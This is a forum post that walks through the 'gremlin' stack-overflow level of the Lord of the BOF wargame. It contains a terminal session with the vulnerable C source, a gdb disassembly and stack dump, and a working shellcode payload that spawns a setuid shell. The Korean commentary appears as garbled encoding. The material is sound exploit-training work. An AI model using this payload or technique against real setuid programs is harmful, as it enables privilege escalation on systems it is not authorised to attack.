|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8603 [º¹»ç]
Connecting to 192.168.0.22:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
_______________________
_______________________------------------- `\
/:--__ |
||< > | ___________________________/
| \__/_________________------------------- |
| |
| The Lord of the BOF : The Fellowship of the BOF, 2010 |
| |
| |
| [enter to the dungeon] |
| gate : gate |
| |
| [RULE] |
| - do not use local root exploit |
| - do not use LD_PRELOAD to my-pass |
| - do not use single boot [h4ck3rsch001] |
| ____________________|_
| ___________________------------------------- `\
|/`--_ |
||[ ]|| ___________________/
\===/___________________--------------------------
login: gate
Password:
=========================================
¾ÆÀ̵ð´Â gate, ¾ÏÈ£ ¶ÇÇÑ gateÀÌ´Ù.
ÅÚ³ÝÀ¸·Î Á¢¼ÓÇÏÀÚ.
=========================================
Last login: Tue Jul 1 05:20:37 from 192.168.0.4
[gate@localhost gate]$ bash2
[gate@localhost gate]$ ls -al
total 48
drwx------ 2 gate gate 4096 Jul 1 06:19 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 gate gate 1246 Jul 1 07:25 .bash_history
-rw-r--r-- 1 gate gate 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 gate gate 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 gate gate 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 gate gate 333 Feb 26 2010 .emacs
-rw-r--r-- 1 gate gate 3394 Feb 26 2010 .screenrc
-rwsr-sr-x 1 gremlin gremlin 11987 Feb 26 2010 gremlin
-rw-rw-r-- 1 gate gate 272 Mar 29 2010 gremlin.c
=========================================
bash2 ½©À» ÀÌ¿ëÇÏ´Â ÀÌÀ¯´Â
±âÁ¸ÀÇ bash°¡ ¾Æ¸¶ ƯÁ¤¹®ÀÚ¸¦ ÀνÄÇÏÁö ¸øÇÑ´Ù.
±×·¡¼ bash2·Î ½©À» ¶ç¿ü´Ù.
=========================================
[gate@localhost gate]$ cat gremlin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- gremlin
- simple BOF
*/
int main(int argc, char *argv[])
{
char buffer[256];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
=========================================
¼Ò½º¸¦ º¸¸é strcpyÇÔ¼ö¿¡¼ argv[1] ÀÎÀÚ°ªÀ» buffer·Î º¹»çÇÑ´Ù.
strcpy, gets, scanfµîµî ÀÌ·¯ÇÑ ÇÔ¼ö´Â °æ°è°ªÀ» ÁöÁ¤ÇÏÁö ¾Ê°í
sourceº¸´Ù destinationÀÌ ´õ Ä¿µµ ÇÊÅ͸¦ ÇÏÁö¾Ê°í ±×´ë·Î º¹»çÇÑ´Ù.
=========================================
[gate@localhost gate]$ mkdir tmp
[gate@localhost gate]$ ls
gremlin gremlin.c tmp
[gate@localhost gate]$ cp gremlin tmp
[gate@localhost gate]$ cd tmp
[gate@localhost tmp]$ ls -al
total 20
drwxrwxr-x 2 gate gate 4096 Jul 1 12:12 .
drwx------ 3 gate gate 4096 Jul 1 12:12 ..
-rwsr-sr-x 1 gate gate 11987 Jul 1 12:12 gremlin
[gate@localhost tmp]$ gdb -q gremlin
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 <main>: push %ebp
0x8048431 <main+1>: mov %ebp,%esp
0x8048433 <main+3>: sub %esp,0x100
0x8048439 <main+9>: cmp DWORD PTR [%ebp+8],1
0x804843d <main+13>: jg 0x8048456 <main+38>
0x804843f <main+15>: push 0x80484e0
0x8048444 <main+20>: call 0x8048350 <printf>
0x8048449 <main+25>: add %esp,4
0x804844c <main+28>: push 0
0x804844e <main+30>: call 0x8048360 <exit>
0x8048453 <main+35>: add %esp,4
0x8048456 <main+38>: mov %eax,DWORD PTR [%ebp+12]
0x8048459 <main+41>: add %eax,4
0x804845c <main+44>: mov %edx,DWORD PTR [%eax]
0x804845e <main+46>: push %edx
0x804845f <main+47>: lea %eax,[%ebp-256]
0x8048465 <main+53>: push %eax
0x8048466 <main+54>: call 0x8048370 <strcpy>
0x804846b <main+59>: add %esp,8
0x804846e <main+62>: lea %eax,[%ebp-256]
0x8048474 <main+68>: push %eax
0x8048475 <main+69>: push 0x80484ec
0x804847a <main+74>: call 0x8048350 <printf>
0x804847f <main+79>: add %esp,8
0x8048482 <main+82>: leave
0x8048483 <main+83>: ret
0x8048484 <main+84>: nop
0x8048485 <main+85>: nop
0x8048486 <main+86>: nop
0x8048487 <main+87>: nop
0x8048488 <main+88>: nop
0x8048489 <main+89>: nop
0x804848a <main+90>: nop
0x804848b <main+91>: nop
0x804848c <main+92>: nop
0x804848d <main+93>: nop
0x804848e <main+94>: nop
0x804848f <main+95>: nop
End of assembler dump.
(gdb) b *main+54
Breakpoint 1 at 0x8048466
(gdb) r `python -c 'print "\x90"*260+"\xbf"*4'`
Starting program: /home/gate/tmp/gremlin `python -c 'print "\x90"*260+"\xbf"*4'`
Breakpoint 1, 0x8048466 in main ()
(gdb) x/512x $esp
0xbffff8f0: 0xbffff8f8 0xbffffb4c 0x00005a62 0x400081e6
0xbffff900: 0x40029ad5 0x40022004 0x40013868 0x40013ed0
0xbffff910: 0x08048200 0x00003d60 0x40021ca0 0x000006f3
0xbffff920: 0x40021fd0 0x4001ad70 0x400143e0 0x00000003
0xbffff930: 0x40014650 0x00000001 0xbffff950 0x08048170
0xbffff940: 0x400140d4 0x078e530f 0xbffff9cc 0x08048256
0xbffff950: 0x40021ca0 0x400143e0 0xbffff9dc 0x400261a6
0xbffff960: 0x4001ead0 0x400143e0 0x40020290 0x400143e0
0xbffff970: 0x400140d4 0x0177ff8e 0xbffff9fc 0x08048244
0xbffff980: 0x40021590 0x400143e0 0xbffffe22 0xbffff9ef
0xbffff990: 0x00000020 0x401081ec 0xbffff9d0 0x4000a7fd
0xbffff9a0: 0x40010c27 0x40014680 0x00000007 0x4000a74e
0xbffff9b0: 0x08049510 0x4000ae60 0xbffffa44 0x40013ed0
0xbffff9c0: 0x08048170 0x0804951c 0x08048256 0x40021ca0
0xbffff9d0: 0xbffff9f8 0x4000a970 0x400f855b 0x08049510
0xbffff9e0: 0x4000ae60 0xbffffa44 0xbffff9f8 0x0804841b
0xbffff9f0: 0x080494fc 0x08049510 0xbffffa18 0x400309cb
0xbffffa00: 0x00000002 0xbffffa44 0xbffffa50 0x40013868
0xbffffa10: 0x00000002 0x08048380 0x00000000 0x080483a1
0xbffffa20: 0x08048430 0x00000002 0xbffffa44 0x080482e0
0xbffffa30: 0x080484bc 0x4000ae60 0xbffffa3c 0x40013e90
0xbffffa40: 0x00000002 0xbffffb35 0xbffffb4c 0x00000000
0xbffffa50: 0xbffffc55 0xbffffc77 0xbffffc81 0xbffffc8f
0xbffffa60: 0xbffffcae 0xbffffcbb 0xbffffcd3 0xbffffced
0xbffffa70: 0xbffffd0c 0xbffffd17 0xbffffd25 0xbffffd65
0xbffffa80: 0xbffffd77 0xbffffd87 0xbffffd9c 0xbffffdac
0xbffffa90: 0xbffffdb6 0xbffffdd2 0xbffffdeb 0xbffffdf6
0xbffffaa0: 0xbffffe07 0xbffffe1a 0xbffffe22 0x00000000
0xbffffab0: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffac0: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffad0: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffae0: 0x00000009 0x08048380 0x0000000b 0x000001f4
0xbffffaf0: 0x0000000c 0x000001f4 0x0000000d 0x000001f4
0xbffffb00: 0x0000000e 0x000001f4 0x00000010 0x0febfbff
0xbffffb10: 0x0000000f 0xbffffb30 0x00000000 0x00000000
0xbffffb20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb30: 0x36383669 0x6f682f00 0x672f656d 0x2f657461
0xbffffb40: 0x2f706d74 0x6d657267 0x006e696c 0x90909090
0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffb70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffba0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbc0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbd0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbf0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc00: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc10: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc30: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc50: 0xbfbfbfbf 0x53454c00 0x45504f53 0x2f7c3d4e
0xbffffc60: 0x2f727375 0x2f6e6962 0x7373656c 0x65706970
0xbffffc70: 0x2068732e 0x55007325 0x4e524553 0x3d454d41
0xbffffc80: 0x53494800 0x5a495354 0x30313d45 0x48003030
0xbffffc90: 0x4e54534f 0x3d454d41 0x61636f6c 0x736f686c
0xbffffca0: 0x6f6c2e74 0x646c6163 0x69616d6f 0x4f4c006e
0xbffffcb0: 0x4d414e47 0x61673d45 0x52006574 0x544f4d45
0xbffffcc0: 0x534f4845 0x39313d54 0x36312e32 0x2e302e38
0xbffffcd0: 0x4d003032 0x3d4c4941 0x7261762f 0x6f70732f
0xbffffce0: 0x6d2f6c6f 0x2f6c6961 0x65746167 0x43414d00
0xbffffcf0: 0x50595448 0x33693d45 0x722d3638 0x61686465
0xbffffd00: 0x696c2d74 0x2d78756e 0x00756e67 0x4d524554
0xbffffd10: 0x6574783d 0x48006d72 0x5454534f 0x3d455059
0xbffffd20: 0x36383369 0x54415000 0x752f3d48 0x6c2f7273
0xbffffd30: 0x6c61636f 0x6e69622f 0x69622f3a 0x752f3a6e
0xbffffd40: 0x622f7273 0x2f3a6e69 0x2f727375 0x52313158
0xbffffd50: 0x69622f36 0x682f3a6e 0x2f656d6f 0x65746167
0xbffffd60: 0x6e69622f 0x444c4f00 0x3d445750 0x6d6f682f
0xbffffd70: 0x61672f65 0x48006574 0x3d454d4f 0x6d6f682f
0xbffffd80: 0x61672f65 0x49006574 0x5455504e 0x2f3d4352
0xbffffd90: 0x2f637465 0x75706e69 0x00637274 0x4c454853
0xbffffda0: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355
0xbffffdb0: 0x7461673d 0x41420065 0x455f4853 0x2f3d564e
0xbffffdc0: 0x656d6f68 0x7461672f 0x622e2f65 0x72687361
0xbffffdd0: 0x49440063 0x414c5053 0x39313d59 0x36312e32
0xbffffde0: 0x2e302e38 0x303a3032 0x4c00302e 0x3d474e41
---Type <return> to continue, or q <return> to quit---
0xbffffdf0: 0x555f6e65 0x534f0053 0x45505954 0x6e696c3d
0xbffffe00: 0x672d7875 0x5000756e 0x2f3d4457 0x656d6f68
0xbffffe10: 0x7461672f 0x6d742f65 0x48530070 0x3d4c564c
0xbffffe20: 0x534c0032 0x4c4f435f 0x3d53524f 0x303d6f6e
0xbffffe30: 0x69663a30 0x3a30303d 0x303d6964 0x34333b31
0xbffffe40: 0x3d6e6c3a 0x333b3130 0x69703a36 0x3b30343d
0xbffffe50: 0x733a3333 0x31303d6f 0x3a35333b 0x343d6462
0xbffffe60: 0x33333b30 0x3a31303b 0x343d6463 0x33333b30
0xbffffe70: 0x3a31303b 0x303d726f 0x35303b31 0x3b37333b
0xbffffe80: 0x6d3a3134 0x31303d69 0x3b35303b 0x343b3733
0xbffffe90: 0x78653a31 0x3b31303d 0x2a3a3233 0x646d632e
0xbffffea0: 0x3b31303d 0x2a3a3233 0x6578652e 0x3b31303d
0xbffffeb0: 0x2a3a3233 0x6d6f632e 0x3b31303d 0x2a3a3233
0xbffffec0: 0x6d74622e 0x3b31303d 0x2a3a3233 0x7461622e
0xbffffed0: 0x3b31303d 0x2a3a3233 0x3d68732e 0x333b3130
0xbffffee0: 0x2e2a3a32 0x3d687363 0x333b3130 0x2e2a3a32
0xbffffef0: 0x3d726174 0x333b3130 0x2e2a3a31 0x3d7a6774
0xbfffff00: 0x333b3130 0x2e2a3a31 0x3d6a7261 0x333b3130
0xbfffff10: 0x2e2a3a31 0x3d7a6174 0x333b3130 0x2e2a3a31
0xbfffff20: 0x3d687a6c 0x333b3130 0x2e2a3a31 0x3d70697a
0xbfffff30: 0x333b3130 0x2e2a3a31 0x31303d7a 0x3a31333b
0xbfffff40: 0x3d5a2e2a 0x333b3130 0x2e2a3a31 0x303d7a67
0xbfffff50: 0x31333b31 0x622e2a3a 0x303d327a 0x31333b31
0xbfffff60: 0x622e2a3a 0x31303d7a 0x3a31333b 0x7a742e2a
0xbfffff70: 0x3b31303d 0x2a3a3133 0x6d70722e 0x3b31303d
0xbfffff80: 0x2a3a3133 0x6970632e 0x31303d6f 0x3a31333b
0xbfffff90: 0x706a2e2a 0x31303d67 0x3a35333b 0x69672e2a
0xbfffffa0: 0x31303d66 0x3a35333b 0x6d622e2a 0x31303d70
0xbfffffb0: 0x3a35333b 0x62782e2a 0x31303d6d 0x3a35333b
0xbfffffc0: 0x70782e2a 0x31303d6d 0x3a35333b 0x6e702e2a
0xbfffffd0: 0x31303d67 0x3a35333b 0x69742e2a 0x31303d66
0xbfffffe0: 0x3a35333b 0x6f682f00 0x672f656d 0x2f657461
0xbffffff0: 0x2f706d74 0x6d657267 0x006e696c 0x00000000
0xc0000000: Cannot access memory at address 0xc0000000
(gdb) Quit
(gdb) q
The program is running. Exit anyway? (y or n) y
[gate@localhost tmp]$ cd ..
[gate@localhost gate]$ ls
gremlin gremlin.c tmp
[gate@localhost gate]$ ls
gremlin gremlin.c tmp
[gate@localhost gate]$ ./gremlin `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*35+"\x60\xfb\xff\xbf"'`
1h//shh/bin⏓ኂ¡Æ
̀`
bash$ my-pass
euid = 501
[??????????????????]
bash$
|
Hit : 971 Date : 2025/07/02 04:10
|
1617, 
1/81 
